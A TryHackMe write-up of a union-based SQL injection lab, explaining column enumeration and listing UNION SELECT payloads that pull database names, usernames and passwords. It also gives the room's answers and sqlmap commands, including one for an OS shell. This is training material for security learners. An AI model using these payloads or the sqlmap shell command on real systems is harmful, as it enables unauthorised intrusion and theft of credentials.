SQL Injection Tryhackme Writeup
By Shamsher khan This is a Writeup of Tryhackme room “SQL Injection”
Room link: https://tryhackme.com/room/sqlibasics
Note: This room is for Premium Members Only. who purchased THM premium membership.
SQL Injection Lab Tryhackme Writeup
Definition
Union-based SQLi is a SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.
Approach
The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:
SELECT 1, 2 FROM usernames UNION SELECT 1, 2 FROM passwordsThis SQL query will return a single result taken from 2 columns: first and second positions from usernames and passwords.
UNION SQLi attack consists of 3 stages:
1. You need to determine the number of columns you can retrieve.
2. You make sure that the columns you found are in a suitable format
3. Attack and get some interesting data.
> Determining the number of columns required in an SQL injection UNION attack
There are exactly two ways to detect one:
The first one involves injecting a series of ORDER BY queries until an error occurs. For example:
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
# and so on until an error occurs(The last value before the error would indicate the number of columns.)
The second one (most effective in my opinion), would involve submitting a series of UNION SELECT payloads with a number of NULL values:
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
# until the error occursNo error = number of NULL matches the number of columns.
> Finding columns with a useful data type in an SQL injection UNION attack
Generally, the interesting data that you want to retrieve will be in string form. Having already determined the number of required columns, (for example 4) you can probe each column to test whether it can hold string data by replacing one of the UNION SELECT payloads with a string value. In case of 4 you would submit:
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--No error = data type is useful for us (string).
> Using an SQL injection UNION attack to retrieve interesting data
When you have determined the number of columns and found which columns can hold string data, you can finally start retrieving interesting data.
Suppose that:
* The first two steps showed exactly two existing columns with the useful datatype.
* The database contains a table called users with the columns username and password.
(This can be figured out by using the boolean technique from Unit 6)
In this situation, you can retrieve the contents of the user’s table by submitting the input:
' UNION SELECT username, password FROM users --Practice
Go ahead the deploy the provided machine at the beginning of the task. Browse to 10.10.208.189:3000
A given small lab is a highly vulnerable web application, with a lot of misconfigurations and developer mistakes.
First, browse to 10.10.208.189:3000/resetdb.php to set up the database.
Then, go to 10.10.208.189:3000/register.php and register a new account. Make sure you input something interesting, as you'll be able to interact with that data later on! (Question 4)
ow let’s proceed to the main objective — exploiting the web app. A vulnerable search field is located at 10.10.208.189:3000/searchproducts.php
Let’s start our exploitation process!
As you might remember, we, first, need to determine the number of available columns by inputting a series of ' UNION SELECT NULL -- into the search field.
To spice things up, I've configured the database to also throw an error when having a -- at the end. To bypass that, we need to include an additional comment after the --. You can use either // or /* do bypass that configuration.
As you can see on the screenshot above, a single NULL value causes an error, meaning that there are more columns. Try inputting NULL values until you finally get the number. Note it down to answer the questions later on.
' UNION SELECT NULL,NULL,NULL,NULL,NULL -- //Question 1.How many columns are being returned by the query?
Answer: 5
Now, try inputting ‘a’ instead of random NULL values and see if there’s an error. An error will indicate that the given column format is not suitable for us and cannot be exploited.
Question 2. How many of these columns can accept strings? (‘a’)
' UNION SELECT NULL,NULL,NULL,NULL,'a' -- //
' UNION SELECT NULL,NULL,NULL,'a',NULL -- //
' UNION SELECT NULL,NULL,'a',NULL,NULL -- //
' UNION SELECT NULL,'a',NULL,NULL,NULL -- //
' UNION SELECT 'a',NULL,NULL,NULL,NULL -- //Answer: 5
Finally, we can start getting some valuable information. Simply replace some null values with SQL keywords to get information about the database.
Here’s a small list of thing you’d want to retrieve:
1. database()
2. user()
3. @@version
4. username
5. password
6. table_name
7. column_name
Use the database() to answer Question 3.
Question 3. What’s the database name?
' UNION SELECT NULL,database(),NULL,NULL,NULL -- //Answer: sqlitraining
Task 8. Automating exploitation
Question 1. How would you get an OS shell on website “sqli.thm/login.php”? (URL switch comes first)
Answer: sqlmap -u sqli.thm/login.php — os-shell
Question 2. What about listing all databases on the same website? (URL switch comes first)
Answer: sqlmap -u sqli.thm/login.php — dbs
Resources and Practices
Payload Lists:
Project link: http://sqlmap.org/
Github: https://github.com/sqlmapproject/sqlmap
Command examples:
https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet
All-in-one cheat sheet:
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
1. https://github.com/payloadbox/sql-injection-payload-list
2. https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
Guides & Blogs:
1. https://www.sqlinjection.net/
2. http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
3. https://github.com/trietptm/SQL-Injection-Payloads
4. https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet
5. https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/
1. https://portswigger.net/web-security/sql-injection
2. https://github.com/Audi-1/sqli-labs
3. https://github.com/appsecco/sqlinjection-training-app
4. https://tryhackme.com/room/gamezone
5. https://tryhackme.com/room/avengers
6. https://tryhackme.com/room/uopeasy
7. https://tryhackme.com/room/jurassicpark
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
